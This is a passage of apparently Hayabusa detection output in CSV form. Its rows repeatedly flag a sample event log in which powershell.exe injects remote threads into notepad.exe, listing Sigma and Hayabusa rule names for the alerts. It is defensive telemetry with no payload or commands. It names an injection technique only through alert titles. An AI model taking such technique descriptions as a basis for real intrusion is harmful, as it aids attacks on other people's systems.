C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.286 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.286 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.286 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.301 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.301 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.301 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.301 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.317 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.317 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.317 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.317 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.348 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.348 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.348 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.348 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.364 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.364 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.364 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.364 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.380 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.380 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.380 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.380 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.395 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.395 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.395 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.395 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.426 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.426 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.426 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.426 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.442 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.442 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.442 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.442 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.489 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.489 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.489 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.489 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.505 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.505 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.505 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.505 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.520 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.520 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.520 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.520 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.536 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.536 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.536 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.536 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.551 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.551 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.551 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.551 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.567 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.583 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.583 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.583 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.583 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.598 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.598 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.598 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.598 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.614 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.614 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.614 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.614 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.661 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 